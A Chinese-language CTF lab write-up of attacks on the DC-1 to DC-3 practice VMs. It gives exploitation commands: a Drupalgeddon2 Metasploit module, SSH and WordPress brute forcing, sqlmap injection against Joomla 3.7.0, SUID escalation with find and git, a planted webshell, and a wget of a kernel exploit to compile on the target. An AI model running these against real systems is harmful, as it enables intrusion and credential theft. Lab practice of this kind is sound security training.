DC 1-3 靶機滲透
DC-1靶機
埠加內網主機探測,發現192.168.114.146這臺主機,並且開放了有22,80,111以及48683這幾個埠。
發現是Drupal框架。
進行目錄的掃描:
發現admin被禁止訪問,以及robots.txt並進行訪問,發現都是許可權不足,檢視一下漏洞。
看到一個遠端命令執行漏洞,並且metasploit裡面是能直接用的。
得到shell,這裡使用到的模組是exploit/unix/webapp/drupal_drupalgeddon2 。
ls看到第一個flag。
繼續切換到home目錄發現flag4使用者得到flag4,嘗試讀取flag4的密碼,沒有許可權,嘗試提權。
沒有發現可利用的定時計劃。
繼續檢視具有suid的程式嘗試進行提權:
發現find命了,在主目錄下沒辦法建檔案,但是切換到tmp目錄下,穿件檔案
`touch test`
www-data@DC-1:/tmp$ /usr/bin/find test -exec whoami \;
/usr/bin/find test -exec whoami \;
root
提權成功為root。
此時已經是root了,那麼久不管剩下的flag了,這個靶機還是很簡單的。
這道題還有一個麻煩的思路,那就是密碼爆破了
Medusa -M ssh –h 192.168.114.146 –u flag4 -P /usr/share/john/password.lst -e ns -F
利用他的ssh服務,使用medusa進行爆破。
密碼為orange。
提權也是一樣的套路。
DC-2靶機
埠加內網主機探測,發現主機192.168.114.147,開放了80埠以及7744埠。
但是直接訪問是沒有辦法訪問的,跳轉到dc-2就沒有相應了,需要修改一下host檔案。
又是一個wordpress網站,掃目錄沒發現有價值的,wpscan掃一下,發現三個使用者,沒有外掛,主題是twentyseventeen,未發現版本漏洞,檢視站點,發現flag,檢視告訴我們要進行爆破,並且工具推薦我們利用cewl,可能站點有資訊能被利用到吧。
root@kali:~# wpscan --url http://dc-2/ -U dc4-user.txt -P dc-4.txt
登陸成功,使用者為tom。
利用vim獲取shell,告訴我們要切換使用者,於是切換使用者,密碼之前已經爆出來了。
得到flag4。
find命令找一下,用git命令使用SUID提權到root。
成功提權
sudo git -p help config
/bin/bash
接著可以利用python創造一個虛擬終端。
DC-3靶機
埠發現只開放了80埠,訪問利用dirb進行目錄爆破,發現很多,先到後臺確認一下,http://192.168.114.148/administrator/
whatweb確認一下版本,只探測到了cms是joomla。
百度了一下,看到工具joomscan,kali裡面直接get一下就行,安裝完成,探測到版本號是3.7.0.檢視有沒有相關漏洞。
發現有很多漏洞,有一個sql注入漏洞。
告訴我們利用sqlmap即可即
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
發現五個資料庫,繼續爆表,joomladb應該能幫助我們找到管理員密碼。
root@kali:~# sqlmap -u "http://192.168.114.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
有76個表。
發現表名:__bsms_books
,以及__users
爆列名:
root@kali:~# sqlmap -u "http://192.168.114.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
發現admin使用者以及他加密後的密碼,準備進行暴力破解,密碼為snoopy。
登陸後端,看看有沒有能夠反彈shell,寫木馬的地方,重新命名一個檔案,寫上一句話木馬,蟻劍連一下,進入虛擬終端。
一些較常規的方法沒有思路,看一下有沒有系統的漏洞。
注意我們找到了這個漏洞,但是利用原始碼的地址是發生了變化,分目錄是tree而不是raw了。
命令:
wget https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip
這個掛了,找不到原始碼包了,總之就是在目標機器上下載這個檔案,然後在目標機器上解壓exploit.tar, 最後就是兩條指令:bash compile.sh,./doubleput